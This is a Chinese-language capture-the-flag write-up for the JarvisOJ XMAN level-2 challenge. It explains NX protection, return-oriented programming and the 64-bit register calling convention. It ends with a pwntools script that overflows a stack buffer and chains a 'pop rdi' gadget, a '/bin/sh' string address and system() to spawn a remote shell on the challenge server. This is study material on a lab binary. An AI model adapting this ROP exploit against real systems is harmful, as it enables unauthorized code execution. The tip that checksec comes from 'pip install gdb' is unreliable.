JarvisOj [XMAN]level-2

思路WP

提示：网上有不少当作32位写的WP，都出现了问题，无法成功cat flag，只有运用ROP的才能成功。

该题会用到gdb中的checksec，可以通过pip install gdb下载。checksec的主要作用是检查elf文件的保护机制。

• 通过checksec后发现开启了NX，因此需要学习ROP。

  
  
  level2 NX.png

NX:NX即No-eXecute（不可执行）的意思，NX（DEP）的基本原理是将数据所在内存页标识为不可执行，当程序溢出成功转入shellcode时，程序会尝试在数据页面上执行指令，此时CPU就会抛出异常，而不是去执行恶意指令。绕过的最主流的方法就死ROP(return-orient-program).

• 打开ida后,同样由main函数开始，到vulner_function函数发现栈溢出，虽然发现有system函数，但system函数中不存在“/bin/sh”的命令。同时也因为NX打开了，因此我们要使用ROP。

  
  
  system.png

ROP的全称为Return-oriented programming（返回导向编程）

level2寻找binsh.png

level2 寻找rdi.png

• 可以得到函数将rdi出栈并且存入第一个寄存器rdi的时候，同时通过ROPgadget的搜索功能,找到程序在data部分有“/bin/sh”的命令，因此我们造一个伪栈帧，但同时我们需要找到寄存器rdi的地址（0x4006b3）并向其写入参数。

  
  
  /bin/sh

为什么我们需要rdi呢？
首先我们必须先知道32位溢出与64位溢出的区别
在32位程序运行中，函数参数直接压入栈中
　　　　调用函数时栈的结构为：调用函数地址->函数的返回地址->参数n->参数n-1->···->参数1
在64位程序运行中，参数传递需要寄存器
　　　　64位参数传递约定：前六个参数按顺序存储在寄存器rdi, rsi, rdx, rcx, r8, r9 中,参数超过六个时，从第七个开始压入栈中

• 因此我们想要覆盖原先的地址，并使他指向“/bin/sh”的时候，我们要得到程序将rdi存到ret时的地址，从而将函数参数存入寄存器，既“/bin/sh”的地址，最后再加上system的地址，这样就构成了一个伪栈帧，达到了我们调用system和“/bin/sh”的目的。

代码

#!usr/bin/env python 
# -*- coding: utf-8 -*-
from pwn import  *
io = remote("pwn2.jarvisoj.com",9882)
elf = ELF("./level2")

sys_addr = elf.symbols["system"]
bin_addr = 0x600A90    #利用ROPgadget获得
rdi_ret = 0x4006B3

payload = ''
payload += 'a' * 0x88
payload += p64(rdi_ret)
payload += p64(bin_addr)
payload += p64(sys_addr)

io.recvline()
io.sendline(payload)
io.interactive()
io.close()

解释

ELF是一种用于二进制文件、可执行文件、目标代码、共享库和核心转储格式文件，即我们下载
得到的文件（在这里我重命名了）
elf.symbols[]可以得到框号中字符作为函数名在本程序中的地址。
sendline（）是传输一行。

结果

level2.png